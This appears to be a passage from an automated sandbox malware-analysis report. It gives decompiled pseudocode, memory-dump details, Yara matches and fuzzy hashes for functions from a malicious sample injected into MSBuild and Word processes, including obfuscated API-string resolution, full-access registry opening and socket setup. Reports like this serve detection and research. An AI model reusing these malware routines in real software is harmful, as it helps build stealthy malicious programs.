                        Function 028B3162 Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B3A60 Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C670A3 Relevance: .0, Instructions: 3COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                        • Instruction ID: aa7568471c24b642ca0eef57f97030f7351818590365929177f3ff10fe4176df
                        • Opcode Fuzzy Hash: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C6B9B3 Relevance: .0, Instructions: 3COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                        • Instruction ID: aa7568471c24b642ca0eef57f97030f7351818590365929177f3ff10fe4176df
                        • Opcode Fuzzy Hash: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C64BB3 Relevance: .0, Instructions: 3COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                        • Instruction ID: aa7568471c24b642ca0eef57f97030f7351818590365929177f3ff10fe4176df
                        • Opcode Fuzzy Hash: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Executed Functions

                        Function 00409E61 Relevance: 7.6, Strings: 6, Instructions: 87COMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E00409E61(void* __edx) {
				intOrPtr _v20;
				intOrPtr _v40;
				intOrPtr _v52;
				char _v60;
				void _v108;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				void* _t29;
				intOrPtr _t31;
				void* _t32;
				void* _t35;
				char* _t36;
				void* _t39;
				char _t45;
				void* _t46;
				intOrPtr* _t48;

				_t39 = __edx;
				memcpy( &_v108, L"ssdaClass", 5 << 2);
				_t48 = _t46 - 0x90 + 0xc;
				_t29 = E004081AA("rdn465d0rCgXRsQ5ad24Yd6");
				_t31 = E00407F8E(_t39, E00407F7A(_t39, "user32.dll"), _t29);
				 *0x42b9e4 = _t31;
				if(_t31 != 0) {
					_t32 = E004081AA("Ed5rCgXRsQ5aC5C");
					_t31 = E00407F8E(_t39, E00407F7A(_t39, "user32.dll"), _t32);
					 *0x42b9e0 = _t31;
					if(_t31 == 0) {
						goto L1;
					} else {
						_t45 =  &_v60;
						_t35 =  &_v108;
						_t31 = E004129E4(_t45, 0, 0x30);
						_v156 = _t45;
						_v60 = 0x30;
						_v52 = E00409CF9;
						_v40 = 0;
						_v20 = _t35;
						L0041F854(); // executed
						_push(0);
						if(_t31 != 0) {
							_v156 = _t35;
							_v116 = 0;
							_v120 = 0;
							_v124 = 0;
							_v128 = 0xfffffffd;
							_v132 = 0;
							_v136 = 0;
							_v140 = 0;
							_v144 = 0;
							_v148 = 0;
							_v152 = 0;
							 *_t48 = 0; // executed
							L0041F8DC(); // executed
							_t48 = _t48 - 0x30;
							_t36 =  &_v140;
							if(_t31 == 0) {
								goto L4;
							} else {
								while(1) {
									_v196 = 0;
									_v200 = 0;
									_v204 = 0;
									 *_t48 = _t36;
									L0041F884();
									_t48 = _t48 - 0x10;
									if(_t31 <= 0) {
										break;
									}
									 *_t48 = _t36;
									L0041F814();
									_push(_t31);
									 *_t48 = _t36;
									L0041F8CC();
									_push(_t39);
								}
								 *0x422830 = 0xa;
							}
						} else {
							L4:
							 *0x422830 = 7;
						}
					}
				} else {
					L1:
					 *0x422830 = 6;
				}
				return _t31;
			}































                        0x00409e61
                        0x00409e78
                        0x00409e78
                        0x00409e81
                        0x00409e9b
                        0x00409ea2
                        0x00409ea7
                        0x00409ebf
                        0x00409ed9
                        0x00409ee0
                        0x00409ee5
                        0x00000000
                        0x00409ee7
                        0x00409ee7
                        0x00409eeb
                        0x00409f02
                        0x00409f07
                        0x00409f0a
                        0x00409f12
                        0x00409f1a
                        0x00409f22
                        0x00409f29
                        0x00409f31
                        0x00409f32
                        0x00409f43
                        0x00409f47
                        0x00409f4f
                        0x00409f57
                        0x00409f5f
                        0x00409f67
                        0x00409f6f
                        0x00409f77
                        0x00409f7f
                        0x00409f87
                        0x00409f8f
                        0x00409f97
                        0x00409f9e
                        0x00409fa3
                        0x00409fa8
                        0x00409fac
                        0x00000000
                        0x00409fae
                        0x00409fae
                        0x00409fae
                        0x00409fb6
                        0x00409fbe
                        0x00409fc6
                        0x00409fc9
                        0x00409fce
                        0x00409fd3
                        0x00000000
                        0x00000000
                        0x00409fd5
                        0x00409fd8
                        0x00409fdd
                        0x00409fde
                        0x00409fe1
                        0x00409fe6
                        0x00409fe6
                        0x00409fe9
                        0x00409fe9
                        0x00409f34
                        0x00409f34
                        0x00409f34
                        0x00409f34
                        0x00409f32
                        0x00409ea9
                        0x00409ea9
                        0x00409ea9
                        0x00409ea9
                        0x00409ffc

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0$0$Ed5rCgXRsQ5aC5C$rdn465d0rCgXRsQ5ad24Yd6$ssdaClass$user32.dll
                        • API String ID: 0-2341246112
                        • Opcode ID: b71ffae2db478e6a0be3980e5627f6dd8d051567762edde8471df975e0d3e002
                        • Instruction ID: dc59c3b724a470855dcc4065ae2b59d1d9b3c777af613543eb6a0d926dcb9681
                        • Opcode Fuzzy Hash: b71ffae2db478e6a0be3980e5627f6dd8d051567762edde8471df975e0d3e002
                        • Instruction Fuzzy Hash: 863108B05183019AE310BF25D55531FBAE0BF84348F41892EF4C4AB292D7BD8949CB9B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00410608 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E00410608(signed int __ecx, char _a4, intOrPtr _a8) {
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v44;
				char* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t41;
				intOrPtr* _t43;

				_t35 = 0;
				_v44 = 0;
				_v52 = 0;
				_v56 = 0xf003f;
				_v60 = 0;
				_v48 =  &_v16;
				_v64 = 0;
				_v68 = 0;
				_v72 = _a8;
				_t27 = _a4;
				_v76 = _t27; // executed
				L0041F454(); // executed
				_t43 = _t41 - 0x20;
				if(_t27 == 0) {
					asm("repne scasb");
					_v104 = 0;
					_v96 = _v16;
					_v92 =  !(__ecx | 0xffffffff) - 1;
					_v100 = _v20;
					_v108 = _v24;
					_t33 = _v52;
					 *_t43 = _t33; // executed
					L0041F41C(); // executed
					_t43 = _t43 - 0x18;
					_t34 = _v76;
					_t35 = 0 | _t33 == 0x00000000;
					 *_t43 = _t34; // executed
					L0041F45C(); // executed
					_push(_t34);
				}
				return _t35;
			}

























                        0x0041060a
                        0x00410613
                        0x0041061b
                        0x00410623
                        0x0041062b
                        0x00410633
                        0x0041063b
                        0x00410643
                        0x0041064b
                        0x0041064f
                        0x00410653
                        0x00410656
                        0x0041065b
                        0x00410660
                        0x0041066b
                        0x00410671
                        0x0041067c
                        0x00410684
                        0x00410688
                        0x00410690
                        0x00410694
                        0x00410698
                        0x0041069b
                        0x004106a0
                        0x004106a5
                        0x004106a9
                        0x004106ac
                        0x004106af
                        0x004106b4
                        0x004106b4
                        0x004106bc

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ?
                        • API String ID: 0-1684325040
                        • Opcode ID: 1e6f53b0590ab74d9dcc6709235106d0a0d986833162969ce48852ece4fb2487
                        • Instruction ID: d7b5c200bfe116dfd6f132702afe2373019979046eeb2612c7d3539b4a1fd506
                        • Opcode Fuzzy Hash: 1e6f53b0590ab74d9dcc6709235106d0a0d986833162969ce48852ece4fb2487
                        • Instruction Fuzzy Hash: 6111B0B45083419FD340EF69D59475BFBE0BB88354F40892EF89883351E7B9D5898F86
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004059D3 Relevance: .2, Instructions: 166COMMON
                        Download Yara Rule
                        C-Code - Quality: 20%
                        			E004059D3(signed int __ecx, signed int _a4, signed int _a8) {
				char _v44;
				char _v48;
				signed int _v60;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				void* __ebp;
				signed int _t57;
				intOrPtr _t61;
				signed int _t63;
				intOrPtr _t71;
				signed int _t73;
				intOrPtr _t77;
				intOrPtr _t83;
				signed int _t87;
				signed int _t89;
				intOrPtr _t90;
				char* _t93;
				char* _t94;
				char* _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int* _t100;
				void* _t101;
				intOrPtr* _t102;

				_t88 = __ecx;
				_t100 =  &_v60;
				_t87 = _a4;
				_t97 = _a8;
				_v48 = 0xffffffff;
				if(E00408E53() != 4) {
					if(E00408E53() != 2) {
						_t93 =  &_v44;
						_v72 = _t97;
						 *_t100 = _t87;
						_v68 = _t93;
						_t57 = E004051B5(__ecx, _t90);
						if(_t57 != 0) {
							_v68 = 6;
							_v72 = 1;
							 *_t100 = 2; // executed
							L0041F8E4(); // executed
							_t101 = _t100 - 0xc;
							_v60 = _t57;
							if(_t57 == 0xffffffff) {
								goto L28;
							}
							_v80 = 0x10;
							_v84 = _t93;
							_v88 = _t57; // executed
							L0041F93C(); // executed
							_t102 = _t101 - 0xc;
							if(_t57 != 0) {
								L12:
								 *_t102 =  &_v72;
								_t57 = E00405999(_t90);
								goto L28;
							}
							L31:
							return _v72;
						}
						L28:
						return _t57 | 0xffffffff;
					}
					if( *0x42b300 == 0) {
						 *0x42b300 =  *0x42b304;
					}
					_t94 =  &_v44;
					_t98 =  &_v48;
					while(1) {
						_t61 =  *0x42b300;
						if(_t61 == 0) {
							goto L31;
						}
						_v68 = _t94;
						_t91 =  *((intOrPtr*)(_t61 + 0x44));
						 *_t100 = _t61 + 4;
						_v72 =  *((intOrPtr*)(_t61 + 0x44));
						_t63 = E004051B5(_t88,  *((intOrPtr*)(_t61 + 0x44)));
						if(_t63 == 0) {
							L26:
							 *0x42b300 =  *((intOrPtr*)( *0x42b300 + 0x88));
							continue;
						}
						_v68 = 0;
						_v72 = 1;
						 *_t100 = 2;
						L0041F8E4();
						_v80 = 0x10;
						_v84 = _t94;
						_v88 = _t63;
						_v60 = _t63;
						L0041F93C();
						_t100 = _t100;
						if(_t63 == 0) {
							_v88 = _t97;
							_v92 = _t87;
							_v96 =  *0x42b300;
							 *_t100 = _v72;
							if(E004058E9(_t98) == 0) {
								goto L23;
							}
							goto L31;
						}
						L23:
						 *_t100 = _t98;
						E00405999(_t91);
						goto L26;
					}
					goto L31;
				}
				if( *0x42b300 == 0) {
					 *0x42b300 =  *0x42b304;
				}
				_t95 =  &_v44;
				_t99 =  &_v48;
				while(1) {
					_t71 =  *0x42b300;
					if(_t71 == 0) {
						goto L31;
					}
					_v68 = _t95;
					_t92 =  *((intOrPtr*)(_t71 + 0x44));
					 *_t100 = _t71 + 4;
					_v72 =  *((intOrPtr*)(_t71 + 0x44));
					_t73 = E004051B5(_t88,  *((intOrPtr*)(_t71 + 0x44)));
					if(_t73 == 0) {
						L15:
						 *0x42b300 =  *((intOrPtr*)( *0x42b300 + 0x88));
						continue;
					}
					_v68 = 0;
					_v72 = 1;
					 *_t100 = 2;
					L0041F8E4();
					_v80 = 0x10;
					_v84 = _t95;
					_v88 = _t73;
					_v60 = _t73;
					L0041F93C();
					_t100 = _t100;
					if(_t73 != 0) {
						L14:
						 *_t100 = _t99;
						E00405999(_t92);
						goto L15;
					}
					_t92 =  *0x42b300;
					_t77 =  *((intOrPtr*)(_t92 + 0x88));
					_t88 =  *((intOrPtr*)(_t77 + 0x44));
					_v96 = _t92;
					_v92 = _t77 + 4;
					_v88 =  *((intOrPtr*)(_t77 + 0x44));
					 *_t100 = _v72;
					if(E004058E9(_t99) == 0) {
						goto L14;
					} else {
						goto L8;
					}
					while(1) {
						L8:
						 *0x42b300 =  *((intOrPtr*)( *0x42b300 + 0x88));
						_t90 =  *0x42b300;
						if(_t90 == 0) {
							goto L31;
						}
						_t83 =  *((intOrPtr*)(_t90 + 0x88));
						_t89 = _v72;
						if(_t83 == 0) {
							_v88 = _t97;
							_v92 = _t87;
						} else {
							_v92 = _t83 + 4;
							_v88 =  *(_t83 + 0x44);
						}
						_v96 = _t90;
						 *_t100 = _t89;
						if(E004058E9(_t99) != 0) {
							continue;
						} else {
							goto L12;
						}
					}
					goto L31;
				}
				goto L31;
			}

































                        0x004059d3
                        0x004059d7
                        0x004059da
                        0x004059de
                        0x004059e2
                        0x004059f2
                        0x00405b38
                        0x00405c00
                        0x00405c04
                        0x00405c08
                        0x00405c0b
                        0x00405c0f
                        0x00405c16
                        0x00405c1d
                        0x00405c25
                        0x00405c2d
                        0x00405c34
                        0x00405c39
                        0x00405c3f
                        0x00405c43
                        0x00000000
                        0x00000000
                        0x00405c45
                        0x00405c4d
                        0x00405c51
                        0x00405c54
                        0x00405c59
                        0x00405c5e
                        0x00405af8
                        0x00405afc
                        0x00405aff
                        0x00000000
                        0x00405aff
                        0x00405c64
                        0x00000000
                        0x00405c64
                        0x00405c18
                        0x00000000
                        0x00405c18
                        0x00405b45
                        0x00405b4c
                        0x00405b4c
                        0x00405b51
                        0x00405b55
                        0x00405b59
                        0x00405b59
                        0x00405b60
                        0x00000000
                        0x00000000
                        0x00405b66
                        0x00405b6a
                        0x00405b70
                        0x00405b73
                        0x00405b77
                        0x00405b7e
                        0x00405beb
                        0x00405bf6
                        0x00000000
                        0x00405bf6
                        0x00405b80
                        0x00405b88
                        0x00405b90
                        0x00405b97
                        0x00405b9f
                        0x00405ba7
                        0x00405bab
                        0x00405bae
                        0x00405bb2
                        0x00405bb7
                        0x00405bbc
                        0x00405bcd
                        0x00405bd1
                        0x00405bd5
                        0x00405bdd
                        0x00405be7
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405be9
                        0x00405bbe
                        0x00405bbe
                        0x00405bc1
                        0x00000000
                        0x00405bc1
                        0x00000000
                        0x00405b59
                        0x004059ff
                        0x00405a06
                        0x00405a06
                        0x00405a0b
                        0x00405a0f
                        0x00405a13
                        0x00405a13
                        0x00405a1a
                        0x00000000
                        0x00000000
                        0x00405a20
                        0x00405a24
                        0x00405a2a
                        0x00405a2d
                        0x00405a31
                        0x00405a38
                        0x00405b1b
                        0x00405b26
                        0x00000000
                        0x00405b26
                        0x00405a3e
                        0x00405a46
                        0x00405a4e
                        0x00405a55
                        0x00405a5d
                        0x00405a65
                        0x00405a69
                        0x00405a6c
                        0x00405a70
                        0x00405a75
                        0x00405a7a
                        0x00405b13
                        0x00405b13
                        0x00405b16
                        0x00000000
                        0x00405b16
                        0x00405a80
                        0x00405a86
                        0x00405a8c
                        0x00405a92
                        0x00405a96
                        0x00405a9e
                        0x00405aa2
                        0x00405aac
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405aae
                        0x00405aae
                        0x00405ab9
                        0x00405abe
                        0x00405ac6
                        0x00000000
                        0x00000000
                        0x00405acc
                        0x00405ad2
                        0x00405ad8
                        0x00405b09
                        0x00405b0d
                        0x00405ada
                        0x00405ae0
                        0x00405ae4
                        0x00405ae4
                        0x00405ae8
                        0x00405aec
                        0x00405af6
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405af6
                        0x00000000
                        0x00405aae
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 257ab1642c2ba7176df9333284737b40def127f22e375dc60ae8d0ec264ec92a
                        • Instruction ID: dc7f80c90ba20af356347f24dd4de35e54817c060e921352895bdcebc13e1e4f
                        • Opcode Fuzzy Hash: 257ab1642c2ba7176df9333284737b40def127f22e375dc60ae8d0ec264ec92a
                        • Instruction Fuzzy Hash: 7D71B7B0508B059FD710EF29D58465BBBE0FF84354F54893EE88897392D778A4468F4A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004106BD Relevance: .1, Instructions: 85COMMON
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E004106BD(void* __eax, char _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v24;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v56;
				char _v60;
				intOrPtr _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v80;
				intOrPtr _v84;
				signed int _v88;
				intOrPtr _v92;
				char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				intOrPtr _v112;
				intOrPtr _v120;
				intOrPtr _v124;
				char* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				signed int _t44;
				signed int _t45;
				signed int _t49;
				char _t51;
				intOrPtr _t53;
				char _t54;
				signed int _t55;
				signed int _t56;
				intOrPtr _t57;
				char* _t58;
				void* _t59;
				void* _t61;
				signed int* _t62;

				_t54 = _a4;
				_t57 = _a8;
				_t56 =  &_v40;
				_v64 = 0x201;
				_v68 = 0;
				_v60 = _t56;
				_t53 = _a12;
				_v72 = _t57;
				_v76 = _t54; // executed
				L0041F42C(); // executed
				_t61 = _t59 - 0x28;
				if(__eax != 0) {
					_v96 = _t54;
					_v80 = _t56;
					_t55 = 0;
					_v84 = 0x101;
					_v88 = 0;
					_v92 = _t57;
					L0041F42C(); // executed
					_t62 = _t61 - 0x14;
					if(__eax == 0) {
						_t44 = _v80;
						_t58 =  &_v76;
						_v100 = 0;
						_v104 = 0;
						_v108 = 0;
						_v96 = _t58;
						_v112 = _t53;
						 *_t62 = _t44;
						L0041F424();
						_t62 = _t62 - 0x18;
						if(_t44 == 0 && _v100 < _v44) {
							goto L7;
						}
						goto L8;
					}
				} else {
					_t51 = _v60;
					_t58 =  &_v56;
					_v80 = 0;
					_v84 = 0;
					_v88 = 0;
					_t55 = 0;
					_v76 = _t58;
					_v92 = _t53;
					_v96 = _t51;
					L0041F424();
					_t62 = _t61 - 0x18;
					if(_t51 == 0 && _v24 > _v80) {
						L7:
						_v120 = _t58;
						_v132 = 0;
						_v136 = _t53;
						_v124 = _v48;
						_v128 =  &_v96;
						_t49 = _v104;
						 *_t62 = _t49;
						L0041F424();
						_t62 = _t62 - 0x18;
						_t55 = _t49 & 0xffffff00 | _t49 == 0x00000000;
					}
					L8:
					_t45 = _v104;
					 *_t62 = _t45;
					L0041F45C();
					_push(_t45);
				}
				return _t55;
			}








































                        0x004106c4
                        0x004106c8
                        0x004106cc
                        0x004106d0
                        0x004106d8
                        0x004106e0
                        0x004106e4
                        0x004106e8
                        0x004106ec
                        0x004106ef
                        0x004106f4
                        0x004106f9
                        0x00410748
                        0x0041074b
                        0x0041074f
                        0x00410751
                        0x00410759
                        0x00410761
                        0x00410765
                        0x0041076a
                        0x0041076f
                        0x00410775
                        0x00410779
                        0x0041077d
                        0x00410785
                        0x0041078d
                        0x00410795
                        0x00410799
                        0x0041079d
                        0x004107a0
                        0x004107a5
                        0x004107aa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004107aa
                        0x004106fb
                        0x004106fb
                        0x004106ff
                        0x00410703
                        0x0041070b
                        0x00410713
                        0x0041071b
                        0x0041071d
                        0x00410721
                        0x00410725
                        0x00410728
                        0x0041072d
                        0x00410732
                        0x004107b6
                        0x004107ba
                        0x004107be
                        0x004107c6
                        0x004107ca
                        0x004107d2
                        0x004107d6
                        0x004107da
                        0x004107dd
                        0x004107e2
                        0x004107ea
                        0x004107ea
                        0x004107ec
                        0x004107ec
                        0x004107f0
                        0x004107f3
                        0x004107f8
                        0x004107f8
                        0x00410802

                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e61b238f31f9a1af3280de932191ddadf40332958d4424c58cf9f30b9089abbc
                        • Instruction ID: b9298c354bfd1ad9ab6003ea3d07812b51851590691558723ca7996c5ddaa5d6
                        • Opcode Fuzzy Hash: e61b238f31f9a1af3280de932191ddadf40332958d4424c58cf9f30b9089abbc
                        • Instruction Fuzzy Hash: 8331C3B55083059BD300AF6AC54435BFBE4BB84758F40892EF89897351D7B8EA898F86
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00409CF9 Relevance: .1, Instructions: 84COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8fa5260b1d5733d40928bb1bda00e8025699e4cb47a79eb0a4c3e691f0a83ba9
                        • Instruction ID: 8f5191d016256b480c4c319c523a8aa6d2556ceaf8fc0f27f6562cff8ba32449
                        • Opcode Fuzzy Hash: 8fa5260b1d5733d40928bb1bda00e8025699e4cb47a79eb0a4c3e691f0a83ba9
                        • Instruction Fuzzy Hash: 7E31B6B0508300DED710EF25C58976BBBE0BF84748F50892EE48997292D779CD85CB8A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004051B5 Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e7b8c339338589e02d34dbb988770e9779c51bc79032b7918c0481683a5381f
                        • Instruction ID: c7c63fa6584d291762938b61b036814656b365f8fb5761cd288c2352f27d1738
                        • Opcode Fuzzy Hash: 2e7b8c339338589e02d34dbb988770e9779c51bc79032b7918c0481683a5381f
                        • Instruction Fuzzy Hash: 6AF01DB45157109FC710EF29C48165BBBE0FF48314F06895DE8C89B316E238D880CB56
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00407F08 Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E00407F08(intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _t11;
				void* _t13;
				intOrPtr* _t14;

				_v44 = 0;
				_v56 = 0;
				 *_t14 = 0;
				_v40 =  &_v16;
				_v48 = _a8;
				_t11 = _a4;
				_v52 = _t11;
				L0041F7DC(); // executed
				_t13 = 0;
				if(_t11 != 0) {
					 *_t14 = _t11; // executed
					L0041F694(); // executed
					_push(_t11);
					_t13 = 1;
				}
				return _t13;
			}












                        0x00407f0f
                        0x00407f17
                        0x00407f1f
                        0x00407f26
                        0x00407f2e
                        0x00407f32
                        0x00407f36
                        0x00407f3a
                        0x00407f3f
                        0x00407f43
                        0x00407f45
                        0x00407f48
                        0x00407f4d
                        0x00407f4e
                        0x00407f4e
                        0x00407f58

                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fb4d98f2a53ae6409f6c220ec1503fd208175c29cdc863a72313857efbd16cf0
                        • Instruction ID: b77cc9640a869472d98c168585856c66a20ad6fb8ba8512900d684390161e27e
                        • Opcode Fuzzy Hash: fb4d98f2a53ae6409f6c220ec1503fd208175c29cdc863a72313857efbd16cf0
                        • Instruction Fuzzy Hash: 72E0C2B0A083418FD300EF29C44034BBBE1AB84308F40882EF898C7740E37ED9498B87
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405959 Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E00405959(void* __edx) {
				char _v412;
				intOrPtr _v424;
				char* _t3;
				intOrPtr* _t5;

				_t3 =  &_v412;
				 *_t5 = 0x202;
				_v424 = _t3;
				L0041F954(); // executed
				if(_t3 != 0) {
					 *_t5 = 0;
					L0041F64C();
				}
				 *_t5 = 0x42b314;
				L0041F56C();
				_push(_t3);
				return _t3;
			}







                        0x0040595f
                        0x00405963
                        0x0040596a
                        0x0040596e
                        0x00405977
                        0x00405979
                        0x00405980
                        0x00405980
                        0x00405985
                        0x0040598c
                        0x00405991
                        0x00405998

                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 586562ab7f660d792621f7f3ff03a76942849b748750d6b5247e0080a37609ce
                        • Instruction ID: 24ad92727fe000e7c60640d94de1f7f21ee868b5df478abe0a14dc0806b9406b
                        • Opcode Fuzzy Hash: 586562ab7f660d792621f7f3ff03a76942849b748750d6b5247e0080a37609ce
                        • Instruction Fuzzy Hash: A4D012F0504301AEE710BF51D4057BA7AE8AB41310F41483EA8D086242D77D448D4AA7
                        Uniqueness

                        Uniqueness Score: -1.00%

